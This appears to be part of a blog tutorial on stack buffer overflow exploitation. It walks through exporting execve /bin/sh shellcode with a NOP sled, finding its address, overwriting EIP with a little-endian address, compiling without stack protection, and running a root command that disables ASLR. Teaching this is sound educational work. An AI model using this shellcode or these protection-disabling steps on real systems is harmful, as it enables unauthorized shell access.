Now that we have the code we want to execute, we need to somehow place it into memory.  There are multiple ways to do this depending on the situation.  One way is to place the shellcode into an environment variable.  Another might be to place the shellcode in any variable which the program reads from the user or a file.  Today we’ll stick with environment variables as they are the most straightforward.  In bash, the command for setting an environment variable is “export”, and the $'...' quoting form turns \x escapes into raw bytes.  Let’s see how to set a variable, SHELLCODE, with our actual shellcode:

user@localhost:~$ export SHELLCODE=$'\x90\x90\x90\x90\x90\x90\x90\x90\x90'\
$'\x90\x90\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8'\
$'\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f'\
$'\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'

We now have an environment variable called SHELLCODE with the opcode we want to execute.  One thing to notice about the shellcode is the set of \x90 at the beginning.  0x90 is the opcode for no operation (“NOP”) on x86.  NOPs don’t cause anything to happen; execution simply moves on to the next instruction.  These NOPs are used for padding (often called a NOP sled), so that if we jump to the memory location of any of them, execution will just slide forward into our actual execve(/bin/sh) code.  Now the next thing we need to do is find the memory address of the SHELLCODE variable.  To do this we will use a C program, such as the following:

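#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    /* Require the name of an environment variable as the first argument. */
    if (argc < 2)
        exit(1);
    /* %p is the portable conversion for printing a pointer value. */
    printf("%p\n", (void *)getenv(argv[1]));
    return 0;
}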

Upon execution, the above program will give us the memory address of the environmental variable we supplied as the first argument.  Thus, we should run it with the argument SHELLCODE.  Let’s try:

user@localhost:/tmp/.somedir$ ./getmem SHELLCODE
0xbfffde83

Excellent!  We have now inserted our shellcode into memory beginning at address 0xbfffde83 via an environment variable.  Our final step is to run our vulnerable program and cause a buffer overflow that overwrites EIP with the value 0xbfffde83.  But before we do, we need to talk about byte order.  There are two byte orders that matter for us today, little-endian and big-endian.  The difference between the two is which byte of a multi-byte value is stored first in memory: little-endian stores the least significant byte at the lowest address, while big-endian stores the most significant byte there.  To keep this post short, x86 is little-endian, so we need to write our memory address in reverse byte order.  Let’s re-examine our vulnerable program and overflow string:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[7];
    char data[] = "aaaaaaaaaaaaaaabbbbcccc";
    strcpy(buffer, data);
}

To change the overflow string to point to our desired memory address (0xbfffde83), we will write it as the following:

char data[] = "aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf";

Thus, our final program with hard-coded memory address pointing to the environmental variable with our shellcode is as follows:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[7];
    char data[] = "aaaaaaaaaaaaaaabbbb\x83\xde\xff\xbf";
    strcpy(buffer, data);
}

Finally, we’ll compile and test our program.  If everything goes correctly, it should spawn a shell.  One final note is that a lot has changed since the original days of buffer overflows.  As such, many compilers automatically include buffer overflow precautions in the programs they compile.  As a result, we will have to compile our program with a couple of special options to make it vulnerable to the simple attack we’re using today.  First, we have to turn off GCC’s stack protector (its stack canaries), which is what -fno-stack-protector does.  Second, we have to allow the stack to be executable with -z execstack, since we’re storing our shellcode there.  Let’s compile and test:

user@localhost:/tmp/.somedir$ gcc -fno-stack-protector -z execstack test.c -o tst
user@localhost:/tmp/.somedir$ ./tst
sh-4.1$

There you have it, a successfully exploited buffer overflow.  If it doesn’t work, one final thing to check would be stack randomization (ASLR).  “cat /proc/sys/kernel/randomize_va_space” should show 0.  If it shows 1 or 2, simply run “echo 0 > /proc/sys/kernel/randomize_va_space” as root to turn it off.

Buffer overflows are one of the older attack vectors when it comes to exploitation and as such, many compilers and operating systems have developed ways to try and prevent these attacks.  However, buffer overflows are still found heavily out in the wild and many of the preventative measures have themselves been circumvented.  In the future we will examine some wargames which focus on various buffer overflows, preventative measures, and ways to combat them.
